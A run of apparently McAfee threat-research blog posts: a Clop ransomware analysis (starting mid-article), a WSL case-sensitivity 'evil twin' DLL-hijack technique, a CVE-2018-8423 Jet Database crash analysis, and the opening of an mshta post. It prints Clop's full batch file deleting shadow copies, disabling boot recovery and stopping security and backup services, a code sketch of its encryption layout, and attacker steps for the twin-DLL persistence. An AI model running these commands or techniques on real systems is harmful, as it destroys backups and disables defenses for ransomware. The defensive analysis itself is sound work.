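   from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

   MARKER = b"Clop^_"
   rsa_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)  # attacker-side in reality
   rsa_public = rsa_private.public_key()

   def encrypt_file_layout(plaintext: bytes) -> bytes:
       aes_key, nonce = os.urandom(32), os.urandom(16)
       enc = Cipher(algorithms.AES(aes_key), modes.CTR(nonce)).encryptor()
       body = enc.update(plaintext) + enc.finalize()
       wrapped_key = rsa_public.encrypt(aes_key + nonce, padding.PKCS1v15())
       return body + MARKER + wrapped_key

   blob = encrypt_file_layout(b"document contents")
   print(MARKER in blob)   # the marker sits between the body and the wrapped key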

The malware’s use of the crypto functions does not support Windows XP, because the CSP used on Windows XP has another name; when run on another operating system, from Windows Vista onwards, the context can be acquired (the name can also be changed in a debugger to acquire it) and the RSA public blob is generated.

Another difference from other ransomware families is that Clop will only encrypt drives that are physically attached/embedded disks (type 3, FIXED) or removable drives (type 2). The malware ignores the REMOTE type (4).

Network shares can still be affected through the “MPR.DLL” functions without any problem.

FIGURE 11. Filemark in the crypted file and key used ciphered

After encrypting a file, the malware tries to open the ransom note in the same folder and, if it exists, continues without overwriting it to save time. If the ransom note does not exist, it accesses a resource in the malware called “OFFNESTOP”. This resource is encrypted with the same XOR operation as the first resource (the .bat file); after decrypting it, the malware writes the ransom note into the folder of the encrypted file.

FIGURE 12. Creation of the ransom note from a crypted resource

Here is a sample of the ransom note of the first version of this malware:

FIGURE 13. Example of ransom note of the first version of the malware

After this, Clop continues with the next file using the same process; however, the hash-based name check is now skipped.

Second Version of the Malware

The second version, found at the end of February, has some changes compared with the first one. The hash of this version is: “ed7db8c2256b2d5f36b3d9c349a6ed0b”.

The first change is to some of the plain text strings in the code used to slow down execution through the “EraseTape” and “FindAtomW” calls. Now the name used for the tape is “” and for the atom “”.

The second change is the name of the encrypted resources in the binary. The first resource, which is again a batch file to delete the shadow volumes and remove the protections in the boot of the machine like the previous one, now has another name: “RC_HTML1”.

FIGURE 14. New resource name for the batch file

However, the algorithm to decrypt this resource is the same; only the long string that acts as the XOR key has changed. Now the string is: “JLKHFVIjewhyur3ikjfldskfkl23j3iuhdnfklqhrjjio2ljkeosfjh7823763647823hrfuweg56t7r6t73824y78Clop”. It is important to remember that this string remains in plain text in the binary but, as it changes between versions, it cannot be used for a Yara rule. The same applies to the names of the resources and to the hash of the resource, because the .bat file changes from version to version, in some cases per line and in others because it contains more code to stop services of security products and databases.

The contents of the new BAT file are:

@echo off

vssadmin Delete Shadows /all /quiet

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

bcdedit /set {default} recoveryenabled No

bcdedit /set {default} bootstatuspolicy ignoreallfailures

vssadmin Delete Shadows /all /quiet

net stop SQLAgent$SYSTEM_BGC /y

net stop “Sophos Device Control Service” /y

net stop macmnsvc /y

net stop SQLAgent$ECWDB2 /y

net stop “Zoolz 2 Service” /y

net stop McTaskManager /y

net stop “Sophos AutoUpdate Service” /y

net stop “Sophos System Protection Service” /y

net stop EraserSvc11710 /y

net stop PDVFSService /y

net stop SQLAgent$PROFXENGAGEMENT /y

net stop SAVService /y

net stop MSSQLFDLauncher$TPSAMA /y

net stop EPSecurityService /y

net stop SQLAgent$SOPHOS /y

net stop “Symantec System Recovery” /y

net stop Antivirus /y

net stop SstpSvc /y

net stop MSOLAP$SQL_2008 /y

net stop TrueKeyServiceHelper /y

net stop sacsvr /y

net stop VeeamNFSSvc /y

net stop FA_Scheduler /y

net stop SAVAdminService /y

net stop EPUpdateService /y

net stop VeeamTransportSvc /y

net stop “Sophos Health Service” /y

net stop bedbg /y

net stop MSSQLSERVER /y

net stop KAVFS /y

net stop Smcinst /y

net stop MSSQLServerADHelper100 /y

net stop TmCCSF /y

net stop wbengine /y

net stop SQLWriter /y

net stop MSSQLFDLauncher$TPS /y

net stop SmcService /y

net stop ReportServer$TPSAMA /y

net stop swi_update /y

net stop AcrSch2Svc /y

net stop MSSQL$SYSTEM_BGC /y

net stop VeeamBrokerSvc /y

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

net stop VeeamDeploymentService /y

net stop SQLAgent$TPS /y

net stop DCAgent /y

net stop “Sophos Message Router” /y

net stop MSSQLFDLauncher$SBSMONITORING /y

net stop wbengine /y

net stop MySQL80 /y

net stop MSOLAP$SYSTEM_BGC /y

net stop ReportServer$TPS /y

net stop MSSQL$ECWDB2 /y

net stop SntpService /y

net stop SQLSERVERAGENT /y

net stop BackupExecManagementService /y

net stop SMTPSvc /y

net stop mfefire /y

net stop BackupExecRPCService /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop klnagent /y

net stop MSExchangeSA /y

net stop MSSQLServerADHelper /y

net stop SQLTELEMETRY /y

net stop “Sophos Clean Service” /y

net stop swi_update_64 /y

net stop “Sophos Web Control Service” /y

net stop EhttpSrv /y

net stop POP3Svc /y

net stop MSOLAP$TPSAMA /y

net stop McAfeeEngineService /y

net stop “Veeam Backup Catalog Data Service” /

net stop MSSQL$SBSMONITORING /y

net stop ReportServer$SYSTEM_BGC /y

net stop AcronisAgent /y

net stop KAVFSGT /y

net stop BackupExecDeviceMediaService /y

net stop MySQL57 /y

net stop McAfeeFrameworkMcAfeeFramework /y

net stop TrueKey /y

net stop VeeamMountSvc /y

net stop MsDtsServer110 /y

net stop SQLAgent$BKUPEXEC /y

net stop UI0Detect /y

net stop ReportServer /y

net stop SQLTELEMETRY$ECWDB2 /y

net stop MSSQLFDLauncher$SYSTEM_BGC /y

net stop MSSQL$BKUPEXEC /y

net stop SQLAgent$PRACTTICEBGC /y

net stop MSExchangeSRS /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop McShield /y

net stop SepMasterService /y

net stop “Sophos MCS Client” /y

net stop VeeamCatalogSvc /y

net stop SQLAgent$SHAREPOINT /y

net stop NetMsmqActivator /y

net stop kavfsslp /y

net stop tmlisten /y

net stop ShMonitor /y

net stop MsDtsServer /y

net stop SQLAgent$SQL_2008 /y

net stop SDRSVC /y

net stop IISAdmin /y

net stop SQLAgent$PRACTTICEMGT /y

net stop BackupExecJobEngine /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop BackupExecAgentBrowser /y

net stop VeeamHvIntegrationSvc /y

net stop masvc /y

net stop W3Svc /y

net stop “SQLsafe Backup Service” /y

net stop SQLAgent$CXDB /y

net stop SQLBrowser /y

net stop MSSQLFDLauncher$SQL_2008 /y

net stop VeeamBackupSvc /y

net stop “Sophos Safestore Service” /y

net stop svcGenericHost /y

net stop ntrtscan /y

net stop SQLAgent$VEEAMSQL2012 /y

net stop MSExchangeMGMT /y

net stop SamSs /y

net stop MSExchangeES /y

net stop MBAMService /y

net stop EsgShKernel /y

net stop ESHASRV /y

net stop MSSQL$TPSAMA /y

net stop SQLAgent$CITRIX_METAFRAME /y

net stop VeeamCloudSvc /y

net stop “Sophos File Scanner Service” /y

net stop “Sophos Agent” /y

net stop MBEndpointAgent /y

net stop swi_service /y

net stop MSSQL$PRACTICEMGT /y

net stop SQLAgent$TPSAMA /y

net stop McAfeeFramework /y

net stop “Enterprise Client Service” /y

net stop SQLAgent$SBSMONITORING /y

net stop MSSQL$VEEAMSQL2012 /y

net stop swi_filter /y

net stop SQLSafeOLRService /y

net stop BackupExecVSSProvider /y

net stop VeeamEnterpriseManagerSvc /y

net stop SQLAgent$SQLEXPRESS /y

net stop OracleClientCache80 /y

net stop MSSQL$PROFXENGAGEMENT /y

net stop IMAP4Svc /y

net stop ARSM /y

net stop MSExchangeIS /y

net stop AVP /y

net stop MSSQLFDLauncher /y

net stop MSExchangeMTA /y

net stop TrueKeyScheduler /y

net stop MSSQL$SOPHOS /y

net stop “SQL Backups” /y

net stop MSSQL$TPS /y

net stop mfemms /y

net stop MsDtsServer100 /y

net stop MSSQL$SHAREPOINT /y

net stop WRSVC /y

net stop mfevtp /y

net stop msftesql$PROD /y

net stop mozyprobackup /y

net stop MSSQL$SQL_2008 /y

net stop SNAC /y

net stop ReportServer$SQL_2008 /y

net stop BackupExecAgentAccelerator /y

net stop MSSQL$SQLEXPRESS /y

net stop MSSQL$PRACTTICEBGC /y

net stop VeeamRESTSvc /y

net stop sophossps /y

net stop ekrn /y

net stop MMS /y

net stop “Sophos MCS Agent” /y

net stop RESvc /y

net stop “Acronis VSS Provider” /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop MSSQLFDLauncher$SHAREPOINT /y

net stop “SQLsafe Filter Service” /y

net stop MSSQL$PROD /y

net stop SQLAgent$PROD /y

net stop MSOLAP$TPS /y

net stop VeeamDeploySvc /y

net stop MSSQLServerOLAPService /y

The next change is the mutex name. In this version it is “HappyLife^_-”, so it can be difficult to build a vaccine based on the mutex name because it can easily be changed in each new sample.

The next change is the hardcoded public key of the malware, which is different from the previous version.

Another change is the file created; the first version creates the file with the name “Favourite” but this version creates it with the name “Comone”.

However, the file encryption algorithm and the mark placed in the encrypted file are the same.

Another difference is the ransom note, which is now clearer, with some changes in the text, and now has 3 emails instead of one to contact the ransomware developers.

FIGURE 15. Example of the new ransom note

Other Samples of the Malware

Clop is a ransomware family that its authors or affiliates can change quickly to make the samples harder to track. The code largely remains the same, but changing the strings can make it more difficult to detect and/or classify correctly.

We will now describe the changes in some samples to show how prolific the Clop ransomware is.

Sample 0403db9fcb37bd8ceec0afd6c3754314 has a compile date of 12 February 2019 and has the following changes compared with other samples:

  • The file created has the name “you_offer.txt”.
  • The name of the device in the fake call to “EraseTape” and “DefineDosDeviceA” functions is “..1”.
  • The atom it searches for (to no purpose) has the name “$$$$”.
  • The mutex name is “MoneyP#666”.
  • The encrypted resources containing the ransom note and the bat file are called “SIXSIX1” for the batch file and “SIXSIX” for the ransom note.
  • The name of the batch file is “clearsystems-10-1.bat”.
  • The key for the XOR operation to decrypt the ransom note and the batch file is:

“Clopfdwsjkjr23LKhuifdhwui73826ygGKUJFHGdwsieflkdsj324765tZPKQWLjwNVBFHewiuhryui32JKG”

  • The batch file is different from the other versions; in this case it does not change the boot configuration of the target victim.

FIGURE 16. Another version of the batch file

  • The email addresses to contact are: icarsole@protonmail.com and unlock@eaqltech.su.
  • As a curiosity, this ransom note has a line that the others do not have: “Every day of delay will cost you additional +0.5 BTC” (about 1,500-1,700 USD).

The 3ea56f82b66b26dc66ee5382d2b6f05d sample has the following points of difference:

  • The name of the file created is “popup.txt”.
  • The DefineDosDeviceA name is “1234567890”.
  • The mutex is “CLOP#666”.
  • This sample was compiled on 7 February.
  • The name of the bat file is “resort0-0-0-1-1-0-bat”.
  • This sample does not support Windows XP because it uses an API that does not exist in Windows XP.
  • The Atom string is “27”.

Sample 846f93fcb65c9e01d99b867fea384edc has these differences:

  • The name of the file created is “HotGIrls”.
  • The DosDevice name is “GVSDFDS”.
  • Atom name: KLHJGWSEUiokgvs.
  • Batch file name “clearnetworksdns-11-22-33.bat”.
  • The email addresses to contact are: unlock@eqaltech.su, unlock@royalmail.su and lestschelager@protonmail.com.
  • The ransom note does not have the previous line about increasing the price, but the maximum number of files that can be decrypted is 7 instead of 6.

As the reader can see, Clop changes its strings and resource names very quickly to make the malware more complex to detect.

We also observed that the .BAT files were not present in earlier Clop ransomware versions.

Global Spread

Based on the versions of Clop we discovered, we detected telemetry hits in the following countries:

  • Switzerland
  • Great Britain
  • Belgium
  • United States
  • The Netherlands
  • Croatia
  • Puerto Rico
  • Germany
  • Turkey
  • Russia
  • Denmark
  • Mexico
  • Canada
  • Dominican Republic

Vaccine

The function that checks a file or folder name using the custom hash algorithm can be a problem for the malware’s execution: if one of the hardcoded hashes is matched at run time, the malware will skip that item. If this happens with a folder, all the files inside that folder will be skipped as well.

As the algorithm and the hash are based on 32 bits and only upper-case characters, it is very easy to create a collision, since we know the target hashes and the algorithm.

It cannot be used as a vaccine on its own, but it can be useful to protect against the malware if the most critical files are placed inside a folder whose name collides with one of the hardcoded hashes.

FIGURE 17. Collision of hashes

In the screenshot “BOOT” is a correct name for the hash, but the others are collisions.
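As an illustration of how cheap collisions are against a 32-bit hash over upper-case names, here is a small sketch. placeholder_hash is a stand-in, since Clop’s custom algorithm is not reproduced here: with the real algorithm and hashes, random candidates collide after roughly 2**16 attempts (birthday bound), and matching one specific hardcoded hash is only a ~2**32 brute force, trivial in a compiled implementation.

   # Birthday-style collision search against a stand-in 32-bit name hash.
   import random, string

   def placeholder_hash(name: str) -> int:
       h = 0
       for ch in name.upper():
           h = (h * 31 + ord(ch)) & 0xFFFFFFFF
       return h

   def random_name(length: int = 8) -> str:
       return "".join(random.choice(string.ascii_uppercase) for _ in range(length))

   seen = {}
   while True:
       name = random_name()
       h = placeholder_hash(name)
       if h in seen and seen[h] != name:
           print(f"collision: {seen[h]!r} and {name!r} -> {h:#010x}")
           break
       seen[h] = name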

This malware has so many changes per version that making a normal vaccine based on the mutex, etc., is impractical.

The Odd One in the Family

Not all ransomware is created equal, and that especially goes for Clop. Earlier in this blog we highlighted some interesting choices the developers made when it came to detecting language settings, processes and the use of batch files to delete the shadow volume copies. During the analysis we found some functions that are unique compared with other ransomware families.

However, Clop does embrace some of the procedures we have seen with other ransomware families by not listing the ransom amount or mentioning a bitcoin address.

Victims must communicate via email instead of with a central command and control server hosting decryption keys. In the newer versions of Clop, victims are required to state their company name and site in the email communications. We are not absolutely sure why this is, but it might be an effort to improve victim tracking.

Looking at the Clop ransom note, it shares TTPs with other ransomware families; e.g. it mimics the Ryuk ransomware and contains similarities with BitPaymer; however, the code and functions are quite different between them.

Coverage

Customers of McAfee gateway and endpoint products are protected against this version.

  • GenericRXHA-RK!3FE02FDD2439
  • GenericRXHA-RK!160FD326A825
  • Trojan-Ransom
  • Ransom-Clop!73FBFBB0FB34
  • Ransom-Clop!0403DB9FCB37
  • Ransom-Clop!227A9F493134
  • Ransom-Clop!A93B3DAA9460
  • GenericRXHA-RK!35792C550176
  • GenericRXHA-RK!738314AA6E07
  • RDN/Generic.dx
  • bub
  • BAT/Ransom-Clob
  • BAT/Ransom-Blob

McAfee ENS customers can create expert rules to prevent batch command execution by the ransomware. A few examples are given below for reference.

The following expert rule can be used to prevent the malware from deleting the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).

When the expert rule is applied at the endpoint, deletion of shadow volume fails with the following error message:

The malware also tries to stop McAfee services using command “net stop McShield /y”. The following expert rule can be used to prevent the malware from stopping McAfee Services:

When the expert rule is applied at the endpoint, the attempt to stop McAfee service using net command fails with the following error message:

Indicators of Compromise

The samples use the following MITRE ATT&CK™ techniques:

  • Execution through API (Batch file for example).
  • Application process discovery, using procedures such as hashes of the name as well as the process name directly.
  • File and directory discovery: to search files to encrypt.
  • Encrypt files.
  • Process discovery: enumerating all processes on the endpoint to kill some special ones.
  • Create files.
  • Create mutants.

Conclusion

Clop ransomware shows characteristics indicating that enterprises, rather than end consumers, are its intended targets. The authors displayed some creative technical solutions to detect the victim’s language settings and installed programs. On the other hand, we also noticed some odd decisions when it came to coding certain functionalities in the ransomware. Unfortunately, it would not be the first time that criminals make money with badly programmed malware.

Clop is constantly evolving and even though we do not know what new changes will be implemented in the future, McAfee ATR will keep a close watch.

IOCs

  • bc59ff12f71e9c8234c5e335d48f308207f6accfad3e953f447e7de1504e57af
  • 31829479fa5b094ca3cfd0222e61295fff4821b778e5a7bd228b0c31f8a3cc44
  • 35b0b54d13f50571239732421818c682fbe83075a4a961b20a7570610348aecc
  • e48900dc697582db4655569bb844602ced3ad2b10b507223912048f1f3039ac6
  • 00e815ade8f3ad89a7726da8edd168df13f96ccb6c3daaf995aa9428bfb9ecf1
  • 2f29950640d024779134334cad79e2013871afa08c7be94356694db12ee437e2
  • c150954e5fdfc100fbb74258cad6ef2595c239c105ff216b1d9a759c0104be04
  • 408af0af7419f67d396f754f01d4757ea89355ad19f71942f8d44c0d5515eec8
  • 0d19f60423cb2128555e831dc340152f9588c99f3e47d64f0bb4206a6213d579
  • 7ada1228c791de703e2a51b1498bc955f14433f65d33342753fdb81bb35e5886
  • 8e1bbe4cedeb7c334fe780ab3fb589fe30ed976153618ac3402a5edff1b17d64
  • d0cde86d47219e9c56b717f55dcdb01b0566344c13aa671613598cab427345b9
  • cff818453138dcd8238f87b33a84e1bc1d560dea80c8d2412e1eb3f7242b27da
  • 929b7bf174638ff8cb158f4e00bc41ed69f1d2afd41ea3c9ee3b0c7dacdfa238
  • 102010727c6fbcd9da02d04ede1a8521ba2355d32da849226e96ef052c080b56
  • 7e91ff12d3f26982473c38a3ae99bfaf0b2966e85046ebed09709b6af797ef66
  • e19d8919f4cb6c1ef8c7f3929d41e8a1a780132cb10f8b80698c8498028d16eb
  • 3ee9b22827cb259f3d69ab974c632cefde71c61b4a9505cec06823076a2f898e

The post Clop Ransomware appeared first on McAfee Blogs.

The Twin Journey, Part 1

Summary and Introduction:

The recent changes in Windows 10, aiming to add case sensitivity (CS) at directory level, have prompted our curiosity to investigate the potential to use CS as a means of obfuscation or WYSINWYG (What You See is NOT What You Get). While CS was our entry point, we then ventured into other file naming techniques to achieve similar outcomes.

Threats and Red Teams may include these techniques in their arsenal to execute various versions of persistence tricks, scan avoidance, security bypass or, in extreme cases, make the system totally unusable.

As part of this blog we use the term “Evil Twins” to describe a scenario where 2 files on disk are crafted using specific file naming techniques to confuse security mechanisms, leading to the good twin being scrutinized while the evil twin flies under the radar.

This is part of a series that will explore each of the different scenarios and techniques we researched.

Evil Twins and WSL (Windows Sub-System for Linux) to the Rescue

The Windows Subsystem for Linux introduces a set of cool new features and provides interoperability between Linux and Windows, including the ability to execute ELF files.

Some time ago, case sensitiveness was enabled by default when using DRVFS, the file system driver that allows Windows drives (C:\, D:\) to be mounted from a WSL instance.

After some internal releases this default was removed, and case sensitiveness behavior changed over time in terms of CS inheritance, including the restriction on changing the sensitiveness of folders that already have “twins”.

The following technique relies on the ability to mount DRVFS with case=force, which will literally override the case sensitiveness set for any directory.

Any attacker that has admin rights and wants to achieve any of the following goals can rely on this approach to:

  • Persist & Hide files
  • Make the OS unusable
  • Stop many products from starting (even if they have other kinds of protection).
  • Alter dlls loaded to control the applications.

This scenario is based on the premise that WSL and a Linux distribution are installed. If those requirements are not met, there are scripts that automate that process, or a custom distribution can even be imported.

For complex scenarios where installing WSL and importing a distribution is required, even though an adversary can do this programmatically (and even remove WSL afterwards), it will still be very noisy in terms of suspicious activity, for instance if the workstation does not belong to a developer. As time goes on, many companies that do Linux development will include WSL as part of the daily toolset for developer workstations, servers, etc.

The execution steps would include something like:

  1. Enable WSL
  2. Check if a distribution is already installed / Install it if missing
  3. Look for LXSS and enable DRVFS force flag
  4. Depending on how the twin will be created you can do several things:
    1. Create a WSL conf file with automount options. This is optional since you can remount the /mnt/c folder with new options.
    2. Copy files from the rootfs folder in Windows to preserve permissions (read/execute/etc.) without messing with ACL’s on the Linux side.
      1. Approach #1: Create the proper files without starting bash until the end (only touching Windows files): Ex: One of the scripts just copies the environment file and, if it is empty, it adds some content, so it is executed from bashrc next time bash is launched.
      2. Approach #2: Create the proper files from bash itself, so you do not need to mess with permissions (this will depend on how systems will be alerted by detecting bash execution, etc.)
    3. Terminate WSL instances.
    4. Start bash (by using a task, autorun, or just as part of the PowerShell script)
      1. From here you can just execute commands as in the POC example; depending on the script arguments, the commands to be executed are part of the /etc/bashrc file.
      2. VOILA, the script will create a folder or copy the twin dll in a non-cs enabled folder, thus promoting the twin as the file to look for next time.

Sample script:

Executing the technique to implant an Evil Twin dll (replacing IEPROXY.dll with a mock that will just change the background):

The IEPROXY.DLL implant taking effect😊

Watch the video recorded by our expert Cedric Cochin, illustrating the entire technique:

Outcomes for this technique include:

  • A piece of ransomware could create a C:\Windows\SYSTEM32 twin folder and prevent a normal boot.
  • A targeted attack could create an IEPROXY.DLL twin so that the next time any application loads the dll it will load the compromised dll.
  • A targeted attack could create a C:\Program Files\[FAVORITE VENDOR] twin to disable that application, if the application is not CS aware/compatible.

Protection and Detection with McAfee Products:

  • By using Endpoint Security Expert Rules, the registry key required to execute the entire workflow can be protected.
  • Active Response:
    • Setup a trigger to be notified of this situation whenever this registry key or a file is modified
      • File Trigger with condition: “Files name equals wsl.conf”
      • Registry Trigger with condition: “WinRegistry keypath starts with HKLM\System\ControlSet001\Services\lxss”
    • Custom collector: PowerShell script that can find duplicated names in a folder. (Scanning the entire disk may take longer than the search timeout.)
    • Files collector if enabled, looking for wsl.conf modifications.
      • “Files where Files name equals wsl.conf”
    • WinRegistry Collector:
      • “WinRegistry where WinRegistry keypath starts with HKLM\System\ControlSet001\Services\lxss”
  • MVISION EDR:
    • File collector if enabled, looking for wsl.conf modifications.
      • “Files where Files name equals wsl.conf”
    • WinRegistry Collector:
      • “WinRegistry where WinRegistry keypath starts with HKLM\System\ControlSet001\Services\lxss”

  • Historical search activity

Artifacts involved:

  • Modification of HKLM:\System\CurrentControlSet\Services\lxss\DrvFsAllowForceCaseSensitivity
  • Bash execution
  • Creation of new folder / dll (twin)
  • Optional:
    • Creation of /etc/wsl.conf ( Can be tracked from Windows rootfs folder)
    • Wslconfig /t execution to terminate instances
    • Installation / Download of Linux distribution or tar file import
    • WSL enabled

The post The Twin Journey, Part 1 appeared first on McAfee Blogs.

Jet Database Engine Flaw May Lead to Exploitation: Analyzing CVE-2018-8423

In September 2018, the Zero Day Initiative published a proof of concept for a vulnerability in Microsoft’s Jet Database Engine. Microsoft released a patch in October 2018. We investigated this flaw at that time to protect our customers. We were able to find some issues with the patch and reported them to Microsoft, which resulted in another vulnerability, CVE-2019-0576, which was fixed on 8-Jan-2019 (Microsoft Jan 2019 Patch Tuesday).

The vulnerability exploits the Microsoft Jet Database Engine, a component used in many Microsoft applications, including Access. The flaw allows an attacker to execute code to escalate privileges or to download malware. We do not know if the vulnerability is used in any attacks; however, the proof of concept code is widely available.

Overview

To exploit this vulnerability, an attacker needs to use social engineering techniques to convince a victim to open a JavaScript file which uses an ADODB connection object to access a malicious Jet Database file. Once the malicious Jet database file is accessed, it calls the vulnerable function in msrd3x40.dll which can lead to exploitation of this vulnerability.

Although the available proof of concept causes a crash in wscript.exe, any application using this DLL is susceptible to the attack.

The following error message indicates the vulnerability was successfully triggered:

The message shows an access violation occurred in the vulnerable DLL. This vulnerability is an “out-of-bounds write,” which can be triggered via OLE DB, the API used to access data in many Microsoft applications. This type of vulnerability indicates that data can be written outside of the intended buffer, resulting in a crash. The cause of the crash is the maliciously crafted Jet database file. The file exploits an index field in the Jet database file format with an unexpectedly large number, resulting in an out-of-bounds write and, ultimately, the preceding crash.

The following diagram provides a high-level view of how the exploit works:

Exploit in Action

The proof of concept code contains one JavaScript file (poc.js), which calls a second file (group1). This is the Jet database file. By running poc.js through wscript.exe, we can trigger the crash.

As we see in the preceding image, we can review debug information to determine the function that crashes is “msrd3x40!TblPage::CreateIndexes.” Furthermore, we can determine that the program is trying to write data and failing. Specifically, we can see that the program is using the “esi” register to write to the location [edx+ecx*4+574h], but that location is not accessible.

We need to understand how this location is constructed to provide clues to the root cause. The debug information shows that register ecx contains the value 0x00002300. Edx is a pointer to memory that we will see again later. Finally, they are added together with an offset of 574h bytes to reference the memory location. From this information, we can guess the type of data that is stored there. It appears to be an array starting at location edx+574h in which each element is 4 bytes long. While tracking the program, we determined the value 0x00002300 comes from the proof-of-concept file group1.

We know that the program attempts to write out of bounds and we know where the attempt occurs. Now we need to determine why the program attempts to write at that location. We investigate the user-provided data of 0x00002300 to understand its purpose. To do this we must understand the Jet database file.

Analyzing the Jet Database File

Many researchers have extensively analyzed the Jet database file structure. Some of the details of previous work can be found at the following links:

To summarize, a Jet database file is organized as a collection of pages, as shown in the following image:

The header page contains various information related to the file:

After the header come 126 bytes, RC4 encrypted, with the specific key 0x6b39dac7, which is the same for every JetDB file. Comparing the key value with the proof-of-concept file, we can identify that group1 is a Jet Version 3 file.
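A minimal sketch of decrypting those 126 header bytes with a plain RC4 implementation is shown below. The key value is the constant mentioned above; treating it as a 4-byte little-endian key and the offset of the encrypted region are assumptions made only for illustration.

   # Sketch: RC4-decrypt the encrypted region of a Jet database header page.
   def rc4(key: bytes, data: bytes) -> bytes:
       S = list(range(256))
       j = 0
       for i in range(256):                       # key-scheduling algorithm
           j = (j + S[i] + key[i % len(key)]) % 256
           S[i], S[j] = S[j], S[i]
       out, i, j = bytearray(), 0, 0
       for b in data:                             # keystream generation + XOR
           i = (i + 1) % 256
           j = (j + S[i]) % 256
           S[i], S[j] = S[j], S[i]
           out.append(b ^ S[(S[i] + S[j]) % 256])
       return bytes(out)

   JET_KEY = (0x6B39DAC7).to_bytes(4, "little")   # byte order assumed for illustration

   with open("group1", "rb") as f:                # the proof-of-concept database file
       page = f.read(0x800)
   decrypted = rc4(JET_KEY, page[0x18:0x18 + 126])  # region offset is illustrative
   print(decrypted[:16].hex())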

Further examination leads to a Table Definition Pages section, which describes various data structures for a table. (Click here for details.)

The table definition data has various fields, including two of note: Index Count and Real Index Count.

We can determine the value of these in our proof-of-concept file. When we check this with the group1 file, we see the following:

There are a total of two indexes in the Index Count. When we parse both indexes, we see the familiar value of 0x00002300:

Our offending value 0x00002300 is the index number for index2 in the table. This index number seems rather large and leads to the crash. Why does it crash the program? Further parsing the file, we find the names of the two indexes:

Debugging

With a debugger attached, we can see that the program first calls the function “msrd3x40!operator new”, which allocates memory and stores the pointer to it in eax:

After the memory is allocated, the program creates the new index:

This index number is used later in the execution. The function msrd3x40!Index::Restore copies that index number to the index address + 24h. This process is repeated in a loop for all indexes. First it calls the “new” operator, which allocates the memory. It then creates an index on that address and moves the index number to the base address of the index +24h. We see this move in the following code, which shows the malicious index value copied to the newly created index:

Once successfully moved, the function msrd3x40!NamedObject::Rename is called and copies the index name value to the index address +40h:

If we look at the esi register, we see it points to the address of the index. The ecx register has a value of [esi+24h], which is the index number:

After a few more instructions, we can observe the original crash instructions. Edx points to the memory location. Ecx contains a very large number from the file group1. The program tries to access memory at location [edx+ecx*4+574h], which will cause the out-of-bounds write and the program crashes:

What is happening with the data the program tries to write? If we watch the instructions, we see that program tries to write the value of esi to [edx+ecx*4+574]. If we print esi or the previous value, we see that it contains the index name ParentIdName, which we saw in group1:

 

Ultimately, the program crashes while trying to process ParentIDName with a very large index number. The logic:

  • Allocate the memory and get the pointer to the start of the memory location.
  • Starting at the memory location +574h, the program saves pointers to the index names, each slot occupying 4 bytes, at the position given by the index number mentioned in the file.

If the index number is very large, as in this case, and no validation is done, then the program will try to write out of bounds and crash.
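In Python terms, the missing validation can be modeled as below; this is only a simplified illustration of why a file-controlled slot number must be bounds-checked before it is used to store the index-name pointer, not the actual msrd3x40.dll logic.

   # Simplified model of the missing bounds check on the index number.
   def store_index_name(table_slots: list, index_number: int, name: str) -> None:
       if not 0 <= index_number < len(table_slots):      # the check the code lacked
           raise ValueError(f"index number {index_number:#x} is out of range")
       table_slots[index_number] = name                   # equivalent of [edx+ecx*4+574h] = esi

   slots = [None, None]                                   # memory sized for two indexes
   store_index_name(slots, 0, "id")                       # fine
   try:
       store_index_name(slots, 0x2300, "ParentIdName")    # would write far out of bounds
   except ValueError as err:
       print(err)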

Conclusion

This is a logic error and such errors are sometimes hard to catch. Many developers take extra precautions to avoid these types of bugs in their code. It is even more unfortunate when these bugs lead to serious security issues such as with CVE-2018-8423. When these issues are discovered and patched, we recommend applying the vendor patch as soon as possible to reduce your security risks.

Microsoft patches can be downloaded and installed from the following locations for respective CVEs:

CVE-2018-8423

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8423

CVE-2019-0576

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0576

McAfee Detection:

McAfee Network Security Platform customers are protected from this vulnerability by Signature IDs 0x45251700 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2018-8423) and 0x4525890 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2019-0576).

McAfee AV detects the malicious file as BackDoor-DKI.dr.

The McAfee HIPS GBOP (Generic Buffer Overflow Protection) feature might cover this, depending on the process used to exploit the vulnerability.

We thank Steve Povolny of McAfee’s Advanced Threat Research team, and Bing Sun and Imran Ebrahim of McAfee’s Hybrid Gateway Security team for their support and guidance with this analysis.

 

References

The post Jet Database Engine Flaw May Lead to Exploitation: Analyzing CVE-2018-8423 appeared first on McAfee Blogs.

What Is Mshta, How Can It Be Used and How to Protect Against It

The not-so Usual Suspects

There is a growing trend for attackers to more heavily utilize tools that already exist on a system rather than relying totally on their own custom malware.

Using .hta files, or their partner in crime mshta.exe, is an alternative to using macro-enabled documents for attacks and has been around a long time. The tool is so flexible it even has its own cell on the MITRE ATT&CK matrix.

What Makes Mshta Dangerous?

To start, it is a signed, native Microsoft binary that already exists on Windows and can execute code in a variety of ways. In today’s living-off-the-land culture that attackers love, this makes it a prime application of interest, since code execution can be proxied through it.

Mshta.exe can also be used to bypass application whitelisting defenses and browser security settings.

These types of binaries have been colloquially dubbed “LOLBINs” but, more formally, have been turned into techniques within the MITRE Execution tactic: T1218 (Signed Binary Proxy Execution) and T1216 (Signed Script Proxy Execution).[1]
